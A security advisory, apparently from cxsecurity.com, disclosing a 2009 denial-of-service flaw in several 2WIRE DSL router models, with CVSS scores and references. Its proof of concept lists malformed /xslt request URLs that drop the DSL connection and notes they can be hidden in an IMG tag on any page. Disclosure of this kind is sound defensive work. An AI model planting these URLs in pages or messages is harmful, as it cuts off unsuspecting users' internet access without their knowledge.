2WIRE DSL Router (xslt) Denial of Service Vulnerability

2009-04-07 / 2009-04-08
Credit: hkm
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

2WIRE ROUTER DSL DENIAL OF SERVICE VULNERABLE Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51 The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character. PoC: (this can be set in an IMG tag or whatever) http://gateway.2wire.net/xslt?page=%& http://gateway.2wire.net/xslt?page=%@ http://gateway.2wire.net/xslt?page=%! http://gateway.2wire.net/xslt?page=%+ http://gateway.2wire.net/xslt?page=%; http://gateway.2wire.net/xslt?page=%' http://gateway.2wire.net/xslt?page=%~ http://gateway.2wire.net/xslt?page=%* http://gateway.2wire.net/xslt?page=%0 http://gateway.2wire.net/xslt?page=%9 http://gateway.2wire.net/xslt?page=%? http://home... etc... hkm hkm {@} hakim.ws Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex.

References:

http://xforce.iss.net/xforce/xfdb/46537
http://www.securityfocus.com/bid/32211
http://www.milw0rm.com/exploits/7060
http://osvdb.org/49835


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top